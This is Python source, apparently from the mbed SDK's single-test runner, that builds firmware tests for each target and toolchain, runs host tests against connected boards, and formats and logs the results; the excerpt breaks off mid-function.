""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_parser=None,
_opts=None,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_parser = _parser
self.opts = _opts
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Target platform not found' %
(target)))
continue
clean_mbed_libs_options = (self.opts_goanna_for_mbed_sdk or
self.opts_clean or clean)
profile = extract_profile(self.opts_parser, self.opts, toolchain)
stats_depth = self.opts.stats_depth or 2
try:
build_mbed_libs_result = build_mbed_libs(
T, toolchain,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
if not build_mbed_libs_result:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Toolchain %s is not '
'supported for this target'% (T.name, toolchain)))
continue
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building MBED libs for %s using %s'
% (target, toolchain)))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building library %s' % lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir, join(build_dir, test_id), T,
toolchain, test.dependencies, clean=clean_project_options,
verbose=self.opts_verbose, name=project_name, macros=MACROS,
inc_dirs=INC_DIRS, jobs=self.opts_jobs, report=build_report,
properties=build_properties, project_id=test_id,
project_description=test.get_description(),
build_profile=profile, stats_depth=stats_depth)
except Exception as e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building project %s' %
project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print(self.logger.log_line(
self.logger.LogType.INFO,
'Project %s is not supported' % project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id,
test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].items():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].items():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if (self.opts_peripheral_by_names and test.peripherals and
not any((i in self.opts_peripheral_by_names)
for i in test.peripherals)):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral test skipped for target %s' % target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Non automated test skipped for target %s' % target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral %s test skipped for target %s' %
(",".join(test.peripherals), target)))
else:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Test %s skipped for target %s' %
(test_id, target)))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception as e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print("Error: No Mbed available: MUT[%s]" % data['mcu'])
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print("Error: mbed not found with MBEDLS: %s" % data['mcu'])
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print(single_test_output)
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print(self.print_test_result(
single_test_result, target_name_unique, toolchain_name, test_id,
test_description, elapsed_time, single_timeout))
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.items():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print(Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET)
print("Test::Output::Start")
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
